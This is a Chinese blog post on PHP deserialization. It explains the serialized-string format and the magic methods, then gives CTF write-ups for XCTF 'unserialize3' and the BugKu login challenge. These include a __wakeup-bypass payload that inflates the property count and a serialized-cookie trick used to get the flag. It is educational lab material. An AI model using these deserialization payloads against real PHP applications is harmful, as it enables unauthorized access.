php 反序列化

最新推荐文章于 2024-07-19 14:54:41 发布
最新推荐文章于 2024-07-19 14:54:41 发布
阅读量234 收藏 1
点赞数
文章标签: php 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61774705/article/details/125126350
版权

PHP
a - array         b - boolean
d - double         i - integer
o - common object     r - reference
s - string         C - custom object
O - class         N - null
R - pointer reference   U - unicode string

O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}
对象类型:长度:"类名":类中变量的个数:{类型:长度:"值";类型:长度:"值";......}

$s = serialize($变量); //该函数将变量数据进行序列化转换为字符串
$变量 = unserialize($s); //将该文本内容,反序列化到指定的变量中

__construct  当一个对象创建时被调用,
__destruct  当一个对象销毁时被调用,
__toString  当一个对象被当作一个字符串被调用。
__wakeup()  使用unserialize时触发
__sleep()  使用serialize时触发
__destruct()  对象被销毁时触发
__call()  在对象上下文中调用不可访问的方法时触发
__callStatic()  在静态上下文中调用不可访问的方法时触发
__get()  用于从不可访问的属性读取数据
__set()  用于将数据写入不可访问的属性
__isset()  在不可访问的属性上调用isset()或empty()触发
__unset()   在不可访问的属性上使用unset()时触发
__toString()  把类当作字符串使用时触发,返回值需要为字符串
__invoke()  当脚本尝试将对象调用为函数时触发

功防世界 unserialize3

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

创建一个类把它反序列化 ,参入code参数

 /*xctf类后面有一个1,整个1表示的是xctf类中只有1个属性 __wakeup()漏洞就是与序列化字符串的整个属性个数有关。当序列化字符串所表示的对象, 其序列化字符串中属性个数大于真实属性个数时就会跳过__wakeup的执行,从而造成__wakeup()漏洞 */

所以我们传入:O:4:"xctf":2:{s:4:"flag";s:3:"111";} 绕过__wakeup()。

BugKu CTF 点login咋没反应 

查看源码:

发现提示: 

 

 源码:

 <?php
error_reporting(0);
$KEY='ctf.bugku.com';
include_once("flag.php");
$cookie = $_COOKIE['BUGKU'];
if(isset($_GET['22597'])){
    show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{   
    echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center">
  <form method="POST" action="#">
    <p><input name="user" type="text" placeholder="Username"></p>
    <p><input name="password" type="password" placeholder="Password"></p>
    <p><input value="Login" type="button"/></p>
  </form>
</div>
</body>
</html>

<?php
}
?>

就把KEY先序列化然后再用COOKIE方式传入给cookie参数,注意上面是else if 所以不能参入get参数,不然不能执行else if 的代码。

<?php
$KEY='ctf.bugku.com';          
echo(serialize($KEY));       
?>
s:13:"ctf.bugku.com";

 

 

 

 

 

T1M@
关注
PHP反序列化
qq_46430168的博客
07-02 1562
一.序列化和反序列化    1. 序列化(serialize):是将变量或对象转换成字符串的过程。从而达到传输和存储的目的。 class S { public $test=“pikachu”; } s=newS();//创建一个对象serialize(s=new S(); //创建一个对象 serialize(s=newS();//创建一个对象serialize(s); //把这个对象进行序列化 序列化后得到的结果是这个样子的:O:1:“S”:1:{s:4:“tes
php反序列化及__toString()
sinat_31884905的博客
02-21 3660
主要两个文件 index.php <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!<br>"; if(preg_match("/f1a9/",$file)){ e
ToString数据如何反序列化
luoxn28的专栏
03-08 3067
戳蓝字「TopCoder」关注我们哦!不知道小伙伴们有没有这样的困扰,平常开发中写单测,要mock一个复杂的对象,并且也知道了该对象的toString格式数据(比如从日志中获取),但是...
ctfphp反序列化汇总
最新发布
2302_78903258的博客
07-19 1416
解题过程:首先需要找到最后的危险函数,看到了在Vox里面的include。然后想要使用include就要调用fun这个函数想要调用fun就要触发__invoke这个魔术方法__invoke() //当脚本尝试将对象调用为函数时触发作为函数就是添加了一个小括号去触发,发现在Petal类中__get方法具备这个调用函数的功能,所以需要去触发__get这个方法。
php反序列化学习
qq_51233573的博客
01-24 469
❤何为php反序列化 序列化把本来不能直接存储的数据转换成可存储的数据,并且不会丢掉数据格式,而反序列化就是把序列化的数据,转换成我们需要的格式,序列化和反序列化互为逆过程 php反序列化本身不危险,但是反序列化过程中,传入的参数可以被外部用户控制就会造成很大的危害。 ❤php类可能会包含一些特殊的函数,名为magic函数,magic函数命名是以符号“__”开头的,比如__construct, __destruct,__toString, __sleep, __wakeup,这些函数在某些情况下会自动
4-5 php反序列化
weixin_45923850的博客
08-08 258
文章目录php反序列化漏洞介绍序列化&反序列化函数魔术方法__construct()__destruct()__wakeup()__tostring()__sleep()漏洞利用__destruct()函数漏洞利用__wakeup()函数漏洞利用__tostring()函数漏洞利用其他魔术方法漏洞利用漏洞防御 php反序列化 漏洞介绍 序列化和反序列化的目的是使程序间传输对象更方便。序列化就是将对象转换为字符串以便存储并保存当前变量值,方便以后脚本调用之前脚本使用,反序列化逆向,供程序使用。在传入
php反序列化(小白学习心得)
m0_51313985的博客
04-07 658
首先问自己一个问题为什么要进行序列化与反序列化? 例如我们平时写的字符abcdef可以进行一个显示,但在网络上它是不能进行一个正常的传输的,所以序列化就是需要规定一种格式用来作用于网络的传输。 abcdef+空格,加了空格你看不到,你认为这里没有字符,但实际在url栏里它就是%20; 回车换行就是:%0a %0d; php的序列化 php提供序列化和反序列化的函数serialize和unserialize,序列化之后的内容是简单的文本格式,但是对字母大小写和空白敏感(空 格,回车,换行) 序列化后字母标示
浅析PHP反序列化中过滤函数使用不当导致的对象注入问题
12-20
总之,PHP反序列化过程中的对象注入问题主要源于过滤函数处理不当导致的字符串长度变化。开发者在编写代码时应谨慎处理用户输入,并确保过滤和反序列化操作的安全性。正确使用过滤函数,避免在过滤后改变原始序列化...
php反序列化例题.docx
07-18
PHP 反序列化详解 PHP 反序列化是指将序列化的数据重新转换为 PHP 对象或数组的过程。PHP 提供了两个用于序列化和反序列化的函数:`serialize()` 和 `unserialize()`。在本文中,我们将详细介绍 PHP 反序列化的过程...
详解php反序列化
10-15
PHP反序列化PHP编程中的一个重要概念,它涉及到将PHP变量从一种状态转换成另一种状态,即从内存中的表示形式转换成能够在文件或数据库中持久保存的格式,然后再将其还原回内存状态的过程。序列化操作可以通过PHP的...
PHP反序列化&魔术方法
weixin_54882883的博客
06-17 938
php反序列化
PHP原生类反序列化(上)
m0_62422842的博客
06-01 1534
php代码只有一个类或者没有类利用时,我们就可以调用php的内置类来进行目录遍历和任意文件读取等一系列的操作。内置类,顾名思义就是php本身存在的类,我们可以直接拿过来用。本次来学习经常能用到的几种内置类。目录遍历的内置类有三种。 查看官方文档可以发现FilesystemIterator与DirectoryIterator是继承关系的(附上官方文档PHP: SPL - Manual)在该类下有一个_toString方法。这个类会创建一个指定目录的迭代器,当遇上echo输出时就会自动调用_toStrin
php反序列化(ctfshow)
unexpectedthing的博客
11-14 1405
文章目录简介入门反序列化中常见的魔法函数web254web255web256web257为什么需要用urlencode?web258web259介绍web260web261web262web264web263web265web266补充知识点php中输出打印的方式 简介 php序列化和反序列用到两个函数 序列化:serialize,将对象格式化为一个新的字符串 反序列化:unserialize,将字符串还原为原来的对象。 一般在CTF中,可以通过自己写php代码,并传序列化后的代码,可以覆盖原来的代码,从而
CTF php反序列化总结
m0_53567065的博客
11-17 4685
前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~定义:序列化就是将对象转换成字符串。反序列化相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。漏洞原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化的过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。常用魔术方法
反序列化之魔术方法的浅学习
quan9i的博客
05-13 2650
前言 学习反序列化,那么就需要首先掌握魔术方法的使用,本篇文章将尽可能详细的讲解反序列化的魔术方法,博主只是小白,如有问题还请各位师傅多多指点! 魔术方法 常见魔术方法有以下几种 __construct: 在创建对象时候初始化对象,一般用于对变量赋初值。 __destruct: 和构造函数相反,当对象所在函数调用完毕后执行。 __call:当调用对象中不存在的方法会自动调用该方法。 __get():获取对象不存在的属性时执行此函数。 __set():设置对象不存在的属性时执行此函数。 __toString
反序列化漏洞学习
Wawyw's Blog
06-28 470
1、序列化与反序列化概述 什么是序列化与反序列化? 序列化(serialize):将对象转换为字符串 反序列化(unserialize):将字符串转换为对象 序列化机制出现的意义 php程序为了保存和转储对象,提供了序列化的方法,php序列化是为了在程序运行的过程中对对象进行转储而产生的。序列化可以将对象转换成字符串,但仅保留对象里的成员变量,不保留函数方法。 简单例子 <?php class Students{ public $name,$age; public functio
攻防世界——ctf php反序列化
qq_43409582的博客
06-03 3061
php反序列化学习 今天的做了个反序列化CTF题,先拜读大佬们的文章弄懂了啥叫反序列化: serialize:序列化 unserialize: 反序列化 简单解释: serialize 把一个对象转成字符串形式, 可以用于保存 unserialize 把serialize序列化后的字符串变成一个对象 详细的请看:(CVE-2016-7124 https://bugs.php.net/bug.ph...
CTF——Web——PHP序列化和反序列化
小锤队长的博客
08-09 5780
PHP 序列化和反序列化: 1,序列化(串行化):是将变量转换为可保存或传输的字符串的过程; 反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。 常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode 在进行类的序列化...
深入理解PHP反序列化机制
"PHP 反序列化详解,包括serialize()函数的使用、序列化的概念和示例,以及PHP反序列化格式的解析。" 在PHP中,反序列化是一个至关重要的概念,它允许我们把之前通过序列化过程保存的字节流(通常是存储在文件或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

T1M@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值